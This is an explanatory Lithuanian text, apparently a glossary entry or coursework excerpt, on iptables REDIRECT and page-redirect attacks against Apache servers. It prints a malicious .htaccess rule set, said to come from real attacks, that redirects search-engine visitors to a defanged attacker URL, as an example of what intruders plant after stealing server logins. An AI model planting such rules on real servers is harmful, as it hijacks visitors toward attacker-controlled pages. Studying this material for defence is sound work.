redirect
redirect
Peradresuoti
Iptables komanda, kuri peradresuoja paketų ar srauto maršruto kryptį.
Redirect nurodo persiųsti paketus į nurodytą adresą nekreipiant dėmesio į realų adresą, nurodytą paketo pradžioje. Ši komanda galioja tik TCP ir UDP protokolams. Papildomai galima nurodyti prievadą po „-j redirect“. Tada paketas bus persiųstas į nurodytą prievadą, netgi jei jis turėjo eiti kitur.
Puslapių nukreipimo atakos
- Tai yra viena iš populiariausių naršyklių atakų, nes ją įgyvendinti galima daugybe nesudėtingų būdų (šiame darbe apžvelgsiu tik keletą). Daugelį iš šių atakų galima nesunkiai pastebėti, tačiau šiuolaikinis žmogus yra labai užimtas ir neturi laiko atkreipti į nuorodos adresą kurią atidarinėja. Puslapių nukreipimo ataka, vykdoma įsilaužiant į serverį. Ši ataka veiksminga tais atvejais, kai programišiui pavyksta nusniffinti prisijungimo prie serverio duomenis iš vietinių FTP serverių klientų. Nuo šios atakos vartotojas neturi galimybių apsiginti, nebent jo naršyklėje būtų įjungti perspėjimai apie nukreipimus į kitus serverius. Serveriuose, kurie teikia žiniatinklio pasaugas, paprastai veikia programinė įranga vadinama „web server“. Yra daugybė programinės įrangos kuri patenka į šią kategoriją, tačiau populiariausia yra „Apache“. Dabar panagrinėsiu, kaip galima puslapio nukreipimo ataką panaudoti šioje programinėje įrangoje (tačiau su nedideliais pakeitimais tai tinka ir kitiems „web severiams“). „Apache“ serveryje yra speciali direktorija, kurioje yra saugomi serverio nustatymai (failas „*.htaccess“). Šiame faile yra saugomas taisyklių rinkinys, kuriame nurodyta kaip ir kam web puslapis bus pateikiamas. Panaudojant šias žinias galima padaryti taip, kad vartotojas atsidarinėdamas web serverio puslapį, būtų nukreipiamas į visai kitą web dokumentą. Paprastai programišiai prieš nukreipimus įgyvendinančius nustatymus įdeda ir daug nereikšmingų eilučių, tam kad kenkėjišką kodą būtų sunkiau surasti. Kenkėjiškas kodas „Apache“ web serveriui pateiktas 1 pavyzdyje.
1 pavyzdys:
<ifmodule>
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]
RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
</ifmodule>
Šis kodas visus vartotojus, kurie suranda šį web serverį per paieškos sistemas: ask.com, google, msn.com, bing.com, live.com, aol.com, altavista.com, excite.com, searxh.yahoo nukreips adresu http://sokoloperkovuskeci.com/in.php (šis puslapis egzistuoja ir buvo naudotas atakose). Deja, tačiau nuo šios atakos 100% labai sunku apsisaugoti, nes programišiai suranda vis naujų būdų kaip gauti web serverio administratoriaus prisijungimo duomenis.
1. REDIRECT with iptables. http://lists.netfilter.org/pipermail/netfilter/2001-April/010360.html